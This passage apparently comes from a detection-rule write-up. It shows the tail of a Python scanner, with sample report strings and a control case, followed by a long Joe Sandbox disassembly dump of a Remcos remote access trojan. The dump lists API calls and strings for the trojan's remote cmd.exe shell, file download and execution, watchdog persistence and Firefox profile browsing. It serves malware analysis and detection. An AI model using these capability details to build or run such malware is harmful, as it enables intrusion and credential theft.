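SAMPLE_REPORT = """
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
• String ID: Rmc-4NJUM7
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
• String ID: HgF$pth_unenc
• String ID: | $%I64u$5.3.0 Pro$@CG$Connected | $Connecting | $Rmc-4NJUM7$TLS Off$TLS On $TUF
"""

# Constructed control: the read-only registry query function above must not trip the write check.
READ_ONLY_REPORT = """
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNELBASE(?), ref: 0041255F
"""

if __name__ == "__main__":
    print(sorted(scan_report(SAMPLE_REPORT)))     # all four checks fire
    print(sorted(scan_report(READ_ONLY_REPORT)))  # []
```

The write check deliberately requires both the HKCU open/create and a RegSetValueExA in the same fragment, because the report shows several functions that only open HKCU and read (RegQueryValueExA); a rule keyed on the hive handle alone would flag those as persistence too.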

                              Control-flow Graph

                              control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                              • RegCloseKey.KERNELBASE(?), ref: 0041255F
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                              • Opcode Fuzzy Hash: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                              Control-flow Graph

                              control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                              • RegCloseKey.KERNELBASE(?), ref: 00412500
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                              Control-flow Graph

                              control_flow_graph 1214 44e1be-44e1cc GetEnvironmentStringsW 1215 44e1d2-44e1e1 call 44e104 call 446aff 1214->1215 1216 44e1ce-44e1d0 1214->1216 1221 44e1e6-44e1ec 1215->1221 1217 44e209-44e20d 1216->1217 1222 44e1ee-44e1f6 call 435ad0 1221->1222 1223 44e1f9-44e208 call 446ac5 FreeEnvironmentStringsW 1221->1223 1222->1223 1223->1217
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E1C2
                              • _free.LIBCMT ref: 0044E1FB
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E202
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentStrings$Free_free
                              • String ID:
                              • API String ID: 2716640707-0
                              • Opcode ID: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
                              • Instruction ID: bde093253d31ff8e435db0bb20b1dc60884eb56c9c20eb6ac573b4202a4b54cd
                              • Opcode Fuzzy Hash: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
                              • Instruction Fuzzy Hash: B8E0653714492126F211362B7C89D6F2A1DEFC2775B26013AF50596243EE688D0641EA
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                              • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wcslen
                              • String ID: xAG
                              • API String ID: 176396367-2759412365
                              • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                              • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                              • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                              • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                              APIs
                              • _free.LIBCMT ref: 0044B9DF
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap$_free
                              • String ID:
                              • API String ID: 1482568997-0
                              • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                              • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                              • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                              • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                              APIs
                              • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEventStartupsocket
                              • String ID:
                              • API String ID: 1953588214-0
                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                              • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                              APIs
                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                              • Sleep.KERNEL32(000007D0), ref: 00407976
                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                              • API String ID: 2918587301-184849705
                              • Opcode ID: 27224f2a7aa186132a712ae4b6ae46411a5a00ddb7b924fe6b973b313c533f43
                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                              • Opcode Fuzzy Hash: 27224f2a7aa186132a712ae4b6ae46411a5a00ddb7b924fe6b973b313c533f43
                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                              APIs
                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • __Init_thread_footer.LIBCMT ref: 004050CB
                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                              • CloseHandle.KERNEL32 ref: 004053CD
                              • CloseHandle.KERNEL32 ref: 004053D5
                              • CloseHandle.KERNEL32 ref: 004053E7
                              • CloseHandle.KERNEL32 ref: 004053EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                              • API String ID: 3815868655-81343324
                              • Opcode ID: 7b7c0b6b0b1bc352b2ea071c9c26875d1ca54d1275fb18312e3ec054a3f2afea
                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                              • Opcode Fuzzy Hash: 7b7c0b6b0b1bc352b2ea071c9c26875d1ca54d1275fb18312e3ec054a3f2afea
                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                              APIs
                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                              • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                              • API String ID: 65172268-329858390
                              • Opcode ID: 40df72cc02995369b7805ca6c014cc284e8c00477eaf270d4f083364b9d516c5
                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                              • Opcode Fuzzy Hash: 40df72cc02995369b7805ca6c014cc284e8c00477eaf270d4f083364b9d516c5
                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
